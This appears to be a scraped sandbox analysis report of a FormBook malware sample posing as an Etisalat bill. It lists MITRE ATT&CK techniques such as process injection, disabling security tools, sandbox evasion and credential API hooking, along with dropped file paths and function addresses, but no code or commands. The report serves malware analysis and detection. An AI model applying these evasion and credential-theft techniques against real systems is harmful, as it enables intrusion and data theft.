Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Etisalat Summary Bill for the Month of August.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Nasalis

C:\Users\user\AppData\Local\Temp\autE901.tmp

C:\Users\user\AppData\Local\Temp\autE950.tmp

C:\Users\user\AppData\Local\Temp\subpredication

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Etisalat Summary Bill for the Month of August.exe

Function 008A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 008A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 008E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 008A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 008E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 008A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 008A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 008A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 008D8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 01F42620 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 008A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre